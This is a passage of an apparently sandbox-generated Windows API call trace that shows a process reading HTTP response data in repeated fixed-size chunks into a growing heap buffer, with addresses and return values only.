lpBuffer=0x8f16080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f16080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.176] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x4b000) returned 0x8ed0080 [0164.176] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f18880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f18880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.357] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x4d800) returned 0x8ed0080 [0164.357] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f1b080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f1b080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.358] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x50000) returned 0x8ed0080 [0164.358] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f1d880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f1d880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.359] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x52800) returned 0x8ed0080 [0164.359] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f20080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f20080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.359] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x55000) returned 0x8ed0080 [0164.359] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f22880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f22880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.360] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x57800) returned 0x8ed0080 [0164.360] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f25080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f25080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.360] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x5a000) returned 0x8ed0080 [0164.360] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f27880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f27880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.360] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x5c800) returned 0x8ed0080 [0164.360] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f2a080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f2a080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.361] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x5f000) returned 0x8ed0080 [0164.361] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f2c880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f2c880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.361] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x61800) returned 0x8ed0080 [0164.361] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f2f080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f2f080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.362] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x64000) returned 0x8ed0080 [0164.362] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f31880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f31880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.362] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x66800) returned 0x8ed0080 [0164.362] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f34080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f34080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.362] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x69000) returned 0x8ed0080 [0164.362] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f36880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f36880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.363] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x6b800) returned 0x8ed0080 [0164.363] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f39080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f39080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.408] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x6e000) returned 0x8ed0080 [0164.409] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f3b880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f3b880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.410] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x70800) returned 0x8ed0080 [0164.410] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f3e080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f3e080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.413] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x73000) returned 0x8ed0080 [0164.414] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f40880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f40880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.414] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x75800) returned 0x8ed0080 [0164.414] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f43080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f43080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.414] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x78000) returned 0x8ed0080 [0164.415] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f45880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f45880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.458] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x7a800) returned 0x8ed0080 [0164.458] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f48080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f48080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.459] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x7d000) returned 0x8ed0080 [0164.459] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f4a880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f4a880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.461] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x7f800) returned 0x8ed0080 [0164.461] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f4d080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f4d080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.462] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x82000) returned 0xb3d0080 [0164.477] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb44f880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb44f880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.477] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xb3d0080, Size=0x84800) returned 0xb452090 [0164.488] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb4d4090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb4d4090*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.503] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xb452090, Size=0x87000) returned 0xb4d68a0 [0164.572] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb55b0a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb55b0a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.573] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xb4d68a0, Size=0x89800) returned 0xb4d68a0 [0164.574] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb55d8a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb55d8a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.574] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xb4d68a0, Size=0x8c000) returned 0xb3d0080 [0164.585] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb459880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb459880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.586] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xb3d0080, Size=0x8e800) returned 0xf7d0080 [0164.607] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf85c080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf85c080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.612] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf7d0080, Size=0x91000) returned 0xf85e890 [0164.622] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf8ed090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf8ed090*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.623] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf85e890, Size=0x93800) returned 0xf8ef8a0 [0164.642] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9808a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9808a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.645] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef8a0, Size=0x96000) returned 0xf8ef8a0 [0164.645] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9830a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9830a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.647] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef8a0, Size=0x98800) returned 0xf7d0080 [0164.668] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf866080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf866080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.669] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf7d0080, Size=0x9b000) returned 0xf8ef010 [0164.672] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf987810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf987810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.673] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0x9d800) returned 0xf8ef010 [0164.674] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf98a010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf98a010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.674] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xa0000) returned 0xf8ef010 [0164.674] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf98c810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf98c810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.675] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xa2800) returned 0xf8ef010 [0164.675] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf98f010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf98f010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.675] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xa5000) returned 0xf8ef010 [0164.675] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf991810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf991810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.676] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xa7800) returned 0xf8ef010 [0164.676] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf994010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf994010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.676] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xaa000) returned 0xf8ef010 [0164.676] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf996810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf996810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.677] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xac800) returned 0xf8ef010 [0164.677] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf999010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf999010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.677] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xaf000) returned 0xf8ef010 [0164.678] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf99b810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf99b810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.678] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xb1800) returned 0xf8ef010 [0164.678] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf99e010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf99e010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.679] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xb4000) returned 0xf8ef010 [0164.679] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9a0810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9a0810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.680] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xb6800) returned 0xf8ef010 [0164.680] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9a3010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9a3010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.680] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xb9000) returned 0xf8ef010 [0164.681] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9a5810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9a5810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.681] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xbb800) returned 0xf8ef010 [0164.681] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9a8010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9a8010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.691] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xbe000) returned 0xf8ef010 [0164.691] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9aa810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9aa810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.695] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xc0800) returned 0xf8ef010 [0164.695] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9ad010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9ad010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.700] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xc3000) returned 0xf8ef010 [0164.700] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9af810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9af810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.702] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xc5800) returned 0xf8ef010 [0164.703] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9b2010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9b2010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.708] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xc8000) returned 0xf8ef010 [0164.709] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9b4810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9b4810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.709] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xca800) returned 0xf8ef010 [0164.709] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9b7010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9b7010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.742] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xcd000) returned 0xf8ef010 [0164.743] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9b9810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9b9810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.743] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xcf800) returned 0xf8ef010 [0164.743] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9bc010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9bc010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.745] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xd2000) returned 0xf8ef010 [0164.746] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9be810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9be810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.749] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xd4800) returned 0xf8ef010 [0164.750] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9c1010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9c1010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.753] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xd7000) returned 0xf8ef010 [0164.754] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9c3810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9c3810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.756] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xd9800) returned 0xf8ef010 [0164.756] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9c6010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9c6010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.756] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xdc000) returned 0xf8ef010 [0164.757] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9c8810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9c8810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.789] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xde800) returned 0xf8ef010 [0164.790] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9cb010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9cb010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.792] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xe1000) returned 0xf8ef010 [0164.792] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9cd810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9cd810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.797] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xe3800) returned 0xf8ef010 [0164.799] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9d0010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9d0010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.800] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xe6000) returned 0xf8ef010 [0164.801] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9d2810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9d2810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.801] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xe8800) returned 0xf8ef010 [0164.801] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9d5010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9d5010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.805] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xeb000) returned 0xf8ef010 [0164.806] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9d7810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9d7810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.806] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xed800) returned 0xf8ef010 [0164.806] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9da010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9da010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.834] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xf0000) returned 0xf8ef010 [0164.869] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9dc810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9dc810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.870] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xf2800) returned 0xf8ef010 [0164.870] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9df010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9df010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.870] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xf5000) returned 0xf8ef010 [0164.871] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9e1810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9e1810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.871] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xf7800) returned 0xf8ef010 [0164.871] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9e4010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9e4010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.872] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xfa000) returned 0xf8ef010 [0164.872] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9e6810, dwNumberOfBytesToRead=0x2800, 